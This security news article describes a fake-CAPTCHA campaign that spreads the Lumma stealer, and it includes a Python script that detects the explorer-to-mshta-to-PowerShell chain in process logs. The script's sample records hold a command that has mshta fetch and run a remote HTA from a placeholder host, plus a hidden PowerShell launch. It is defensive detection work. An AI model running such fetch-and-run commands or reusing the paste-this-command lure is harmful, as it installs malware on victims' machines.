Global Alert: Deceptive CAPTCHA Scam Unleashes Dangerous Lumma Malware Across Industries

Lumma Stealer Malware Exploits Fake CAPTCHA in Global Campaign

Cybersecurity researchers have identified a sophisticated malware campaign that uses fake CAPTCHA verification pages to distribute the Lumma information stealer. The global campaign has targeted multiple countries, including Argentina, Colombia, the United States, and the Philippines, and has affected a range of industries, with telecommunications the hardest hit.

The attack methodology involves:
1. Victims visit compromised websites
2. Users are redirected to fake CAPTCHA pages
3. Victims are prompted to copy and paste a command into the Windows Run dialog
4. The command executes mshta.exe to download and run a malicious HTA file
5. Multiple PowerShell scripts are deployed to ultimately deliver the Lumma payload
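The chain above leaves a distinctive trail in process-creation telemetry: a command typed into the Run dialog is launched as a child of explorer.exe, mshta.exe is handed a remote URL rather than a local file, and mshta.exe in turn spawns a script host such as powershell.exe. The following detection logic, added here as an example and not taken from the original report or from any vendor's product, scores constructed Sysmon-style process-creation records against those three observations. Field names (`image`, `parent_image`, `command_line`) and the sample records, including the placeholder URL, are assumptions made for the example.

```python
"""Flag the fake-CAPTCHA delivery chain (explorer -> mshta -> PowerShell)
in process-creation logs.

Added example for this article; the records below are constructed in a
simplified Sysmon Event ID 1 style and the field names are assumptions.
"""
from __future__ import annotations

import re

# Remote targets handed to mshta: http(s)/ftp URLs or UNC paths.
REMOTE_TARGET = re.compile(r"(?i)\b(?:https?|ftp)://|\\\\[\w.-]+\\")

# Script interpreters that should rarely, if ever, be children of mshta.exe.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed sample events. The URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 2880, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "command_line": r"C:\Windows\Explorer.EXE"},
    # Command pasted into the Run dialog: explorer.exe launches mshta with a URL.
    {"pid": 5204, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"mshta https://example.invalid/verify/captcha.hta"},
    # The HTA then spawns PowerShell (arguments elided in this sample).
    {"pid": 5310, "ppid": 5204,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"powershell.exe -NoProfile -WindowStyle Hidden -Command <elided>"},
    # Benign: an installer running a local HTA wizard should not be flagged.
    {"pid": 6001, "ppid": 3000, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Vendor\setup.exe",
     "command_line": r"mshta C:\Program Files\Vendor\wizard.hta"},
]


def image_name(path: str) -> str:
    """Return the lower-cased file name from an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> list[str]:
    """Return the names of the rules a single process-creation event matches."""
    rules: list[str] = []
    image = image_name(event["image"])
    parent = image_name(event["parent_image"])
    cmdline = event["command_line"]

    if image == "mshta.exe":
        # mshta fetching its HTA from a remote location is the delivery step.
        if REMOTE_TARGET.search(cmdline):
            rules.append("mshta_remote_target")
        # explorer.exe as parent is what a Run-dialog launch looks like.
        if parent == "explorer.exe":
            rules.append("mshta_from_explorer")

    # The HTA handing off to a script host is the second stage.
    if image in SCRIPT_HOSTS and parent == "mshta.exe":
        rules.append("script_host_child_of_mshta")
    return rules


def detect(events: list[dict]) -> list[dict]:
    """Run every rule over a batch of events and return one finding per match."""
    findings = []
    for ev in events:
        for rule in check_event(ev):
            findings.append({"pid": ev["pid"], "rule": rule,
                             "command_line": ev["command_line"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid={f['pid']} rule={f['rule']} cmd={f['command_line']}")
```

The two mshta rules fire on the pasted command while the local-HTA installer stays quiet, and the third rule catches the hand-off to PowerShell; correlating all three on the same process tree within a short window gives a high-confidence alert. Where mshta.exe has no business use, blocking it with application control removes the delivery step outright.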

The malware employs advanced evasion techniques, including bypassing the Windows Antimalware Scan Interface (AMSI). Because the victim launches the command from the Run dialog rather than from the web page, execution takes place outside the browser, sidestepping browser-based security controls entirely.

Recent Developments:
– Approximately 1,000 counterfeit domains impersonating Reddit and WeTransfer have been identified distributing Lumma
– The malware operates on a Malware-as-a-Service (MaaS) model
– Similar techniques were used earlier to spread Vidar Stealer malware through fake AnyDesk domains

Additionally, researchers have noted the emergence of an updated Phishing-as-a-Service toolkit, Tycoon 2FA, featuring enhanced security evasion capabilities. Credential harvesting attacks are also exploiting Gravatar’s profile service to create convincing fake profiles of legitimate services like AT&T, Comcast, and Proton Mail.
